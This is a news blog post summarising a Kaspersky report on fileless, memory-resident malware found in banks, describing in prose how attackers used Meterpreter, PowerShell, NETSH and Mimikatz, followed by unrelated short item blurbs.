Duqu 2.0 is a strain of clever, nearly undetectable malware, derived from Stuxnet, that stays resident in its hosts' memory without ever writing persistent files to the system's drives.
Kaspersky Lab is about to publish a new report about the prevalence of file-less malware in 140 known banks and other firms in 40 countries -- and since this kind of malware is so hard to detect, Kaspersky estimates that the true infection rate is much higher.
Kaspersky isn't sure how the malware spreads.
The researchers first discovered the malware late last year, when a bank's security team found a copy of Meterpreter—an in-memory component of Metasploit—residing inside the physical memory of a Microsoft domain controller. After conducting a forensic analysis, the researchers found that the Meterpreter code was downloaded and injected into memory using PowerShell commands. The infected machine also used Microsoft's NETSH networking tool to transport data to attacker-controlled servers. To obtain the administrative privileges necessary to do these things, the attackers also relied on Mimikatz. To reduce the evidence left in logs or hard drives, the attackers stashed the PowerShell commands into the Windows registry.
Fortunately, the evidence on the domain controller was intact, presumably because it hadn't been restarted before Kaspersky Lab researchers began their investigation. An analysis of the dumped memory contents and the Windows registries allowed the researchers to restore the Meterpreter and Mimikatz code. The attackers, the researchers later determined, had used the tools to collect passwords of system administrators and for the remote administration of infected host machines.
A rash of invisible, fileless malware is infecting banks around the globe
[Dan Goodin/Ars Technica]
Wired security reporter Andy Greenberg's latest book is Sandworm (previously), a true-life technothriller that tells the stories of the cybersecurity experts who analyzed and attributed as series of ghastly cyberwar attacks that brought down parts of the Ukrainian power grid, and then escaped the attackers' control and spread all over the world.
Daniel Moghimi, Berk Sunar, Thomas Eisenbarth and Nadia Heninger have published TPM-FAIL: TPM meets Timing and Lattice Attacks, their Usenix security paper, which reveals a pair of timing attacks against trusted computing chips ("Trusted Computing Modules" or TPMs), the widely deployed cryptographic co-processors used for a variety of mission-critical secure computing tasks, from verifying software […]
The privacy-focused web browser Brave has finally launched a 1.0 version, bringing it officially out of beta.
WordPress is a fantastic tool for building web pages – if you know how to use it. Even with all the accessibility, a lot of the deeper features of WordPress are lost in translation to the average user. Enter WP Page Builder, a tool that not only makes WordPress site design easy but also more […]
In this age of ever-shrinking gadgets, it bears reminding that sometimes bigger is actually better. And if you care about audio quality, we can’t think of a better example of this principle than these TREBLAB Z2 Bluetooth 5.0 Noise-Cancelling Headphones. We know tiny Bluetooth earbuds are all the rage right now. But their battery life […]
In this Instagram age, pictures aren’t just worth a thousand words; they can be worth a pretty penny, too, which makes graphic designers a highly sought-after profession. But being a graphic artist takes more than just the ability to draw a picture, and certainly more than the ability to navigate through Photoshop. The School of […]